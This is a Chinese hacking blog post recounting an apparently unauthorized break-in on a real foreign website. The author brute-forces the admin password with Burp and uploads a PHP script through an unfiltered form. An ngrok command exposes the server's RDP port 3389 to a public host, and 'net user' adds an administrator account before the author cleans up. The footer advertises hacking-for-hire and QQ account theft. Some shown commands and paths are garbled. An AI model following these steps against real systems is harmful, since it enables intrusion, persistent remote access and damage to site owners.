黑客意志

一个弱口令引发的血案

注:文章内容仅供参考学习,任何人不得用于非法测试。请遵守国家法律法规,做一个守法的良好公民。

这个站是去年8月份的,当然,不是国内的站。后来这个站都被人日穿了。当时也没想着写文章。前段时间去看了看发现,漏洞还存在。所有有了这篇文章。

发现一个 php 的站,Apache 的容器 Windows 的系统 .IP 嘛,当然站是国外的。这里以 ip 就以123.123.1.1 代替。 一顿目录乱扫,发现后台竟然是admin 。 Test.php 并没什么卵用。

打开后台是长这样的。

测试了下,admin 123456 ,admin 88888888 然而并没有成功。

直接上burp爆破吧。

尝试了下弱口令。但是并没有跑出来。

这里浪费我比较长的时间。换了几个字典也没跑出来,最后还是掏出了我珍藏已久的“杀器”。终于是跑出来了。

但是我发现一点细节。很多密码的返回包是一模一样的。

这里我们就查看,正确的返回包的第一个密码,或者最后一个密码。就可以分辨了哪一个是正确的密码了。

登录后台,找上传点。

通过抓包修改,发现并没有过滤。可直接上传php脚本,并解析。

自此,我们拿到了对整个网站的增,删,改,查,的权限。

发现这台服务器,开了3389。

但是,死活连接不上。是内网。需要把流量转发出来。

查看了下当前的进程 并没什么防护软件。

我这里用的是Ngrok ,上传之后执行。

当前存储路径比如C:Program Filesngrok.exe。authtoken 密匙。

提示已保存至C盘什么什么的目录。这里我们需要记得,到时候要删除掉。

再执行 C:Program Filesngrok.exengrok.exe tcp 3389 ,将当前内网的3389端口转发至公网服务器,然后我们去ngrok官网看看,分配的公网服务器地址。

这时候,远程连接问题是搞定的。

因为,之前就查看了当前权限。

这里浪费了半小时左右怎么都添加不了用户。后来执行了这条命令 cmd /C net user

终于成功的,添加了用户名。

然后把用户添加到管理员列表。

登录成功。完事。清理,撤退。

扫码关注公众号

赞(0)
分享到: 更多 (0)

黑客技术,黑客教程,黑客软件,黑客入门,黑客工具,黑客平台,黑客下单,渗透测试,CTF,菠菜,源码,暗网,安卓,物联网安全,网络安全周,国家安全,企业安全,盗QQ号,正规黑客,接单黑客,SRC测试,黑客修改,黑客交流,黑客追款,APP渗透,黑客系统

联系我们联系我们